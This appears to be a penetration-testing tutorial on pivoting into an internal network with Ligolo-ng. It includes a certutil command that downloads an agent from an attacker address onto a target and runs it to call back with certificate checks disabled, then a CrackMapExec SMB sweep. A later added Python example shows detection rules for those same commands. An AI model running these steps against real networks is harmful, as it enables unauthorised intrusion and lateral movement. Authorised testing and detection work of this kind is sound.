Basic Pivoting

Basic Pivoting with Ligolo-ng

Source:

https://github.com/nicocha30/ligolo-ng

Releases:

https://github.com/nicocha30/ligolo-ng/releases


Step 1: Install Ligolo-ng

  1. Download and Unzip Ligolo-ng: Follow the instructions from the Ligolo-ng GitHub repository to download and unzip the contents.


Step 2: Set Up the Interface

To create the interface for pivoting, you need to add a new TUN/TAP interface and bring it up.

  1. Delete Old Routes (if any):

    ip route list
    route del -net 10.0.0.0/24
  2. Add a New Interface:

    ip tuntap add user root mode tun ligolo
    ip link set ligolo up

    This creates the interface ligolo to route traffic through the tunnel.


Step 3: Get Help with Ligolo-ng

You can always get help or view available options by running:

./proxy -h

Step 4: Start the Proxy Server (Listening)

Start the proxy server with the -selfcert option, so that it uses a self-signed certificate while it listens for incoming agent connections:

./proxy -selfcert

Step 5: Move the Agent to the Target Machine

  1. On the target machine, use the following command to download the agent:

    certutil -urlcache -f http://192.168.45.241/agent.exe agent.exe
  2. Once the agent is downloaded, run it with the following command:

    .\agent.exe -connect 192.168.45.241:11601 -ignore-cert

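    Here, the agent connects back to your Kali machine. Note: the proxy is using a self-signed certificate, which is why the -ignore-cert option is included. With -ignore-cert the agent skips certificate validation, so it does not verify which proxy it is talking to.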
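
Seen from the monitored host, the two commands in this step leave recognisable process-creation records. The added example below (not part of the original notes or of the Ligolo-ng project) flags certutil used as a downloader and an agent started with -connect and -ignore-cert, then correlates both by remote host; the event tuples, rule names and function names are constructed for illustration.

```python
import re

# Constructed process-creation records (image, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("certutil.exe", r"certutil -urlcache -f http://192.168.45.241/agent.exe agent.exe"),
    ("agent.exe", r".\agent.exe -connect 192.168.45.241:11601 -ignore-cert"),
    ("certutil.exe", r"certutil -hashfile C:\Temp\setup.msi SHA256"),
    ("svc.exe", r"svc.exe -connect 10.0.5.9:443"),
    ("CertUtil.exe", r"CertUtil.exe /URLCache /f https://198.51.100.7/a.bin a.bin"),
]

# certutil used as a downloader: -urlcache or /urlcache followed by an http(s) URL.
CERTUTIL_DL = re.compile(r"[-/]urlcache\b.*?\bhttps?://(?P<host>[^/\s:]+)", re.I)
# Agent-style callback; Go's flag parser accepts one or two leading dashes.
CONNECT = re.compile(r"-{1,2}connect\s+(?P<host>[^\s:]+):(?P<port>\d+)", re.I)
IGNORE_CERT = re.compile(r"-{1,2}ignore-cert\b", re.I)


def classify(image, cmdline):
    """Return a list of (rule, remote_host, detail) findings for one event."""
    findings = []
    if image.lower().startswith("certutil"):
        m = CERTUTIL_DL.search(cmdline)
        if m:
            findings.append(("certutil_download", m["host"], m.group(0)))
    m = CONNECT.search(cmdline)
    # Require both flags: -connect alone is too generic to alert on.
    if m and IGNORE_CERT.search(cmdline):
        findings.append(("agent_callback_no_cert_check", m["host"], "port " + m["port"]))
    return findings


def correlate(events):
    """Map each remote host to the set of rules it triggered."""
    by_host = {}
    for image, cmdline in events:
        for rule, host, _detail in classify(image, cmdline):
            by_host.setdefault(host, set()).add(rule)
    return by_host


def likely_pivot_hosts(events):
    """Hosts that both served a certutil download and received an agent callback."""
    return sorted(h for h, rules in correlate(events).items() if len(rules) == 2)


if __name__ == "__main__":
    for host in likely_pivot_hosts(SAMPLE_EVENTS):
        print("download + unverified-cert callback to the same host:", host)
```

Matching on the flags rather than the file name keeps the rule working when the agent binary is renamed.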


Step 6: View and Interact with Sessions

To view the active sessions, run the following in the Ligolo-ng proxy console:

sessions

Choose the session by typing its number, for example, '1'. Once you are in the session, run:

ifconfig

This command shows the interfaces on the target machine, including its address on the internal network, like 10.10.86.141/24.


Step 7: Add Routing to the Pivoting Interface

To route traffic through the tunnel (pivot), you need to add the target network to your routing table.

  1. Add a Route to access the internal network:

    ip route add 10.10.86.0/24 dev ligolo
  2. Verify the Route:

    You can check that the route through the ligolo interface was added properly with:

    ip route list

Step 8: Final Step - Start the Pivoting Session

Now that the route is added, go back to your proxy server, ensure you're in the correct session, and start the tunnel.

  1. Select Session:

    Run the command below, then choose the correct session by typing its number (e.g., '1').

    session
  2. Start Pivoting:

    Run the start command to begin the pivot.

    start

Step 9: Verify the Pivoting Setup

Now that the pivot is active, you can verify access to the internal network by using CrackMapExec to check whether the internal machines are reachable over SMB.

crackmapexec smb 10.10.86.0/24

If CrackMapExec can reach the internal machines, the pivot is successful, and you now have access to the internal network.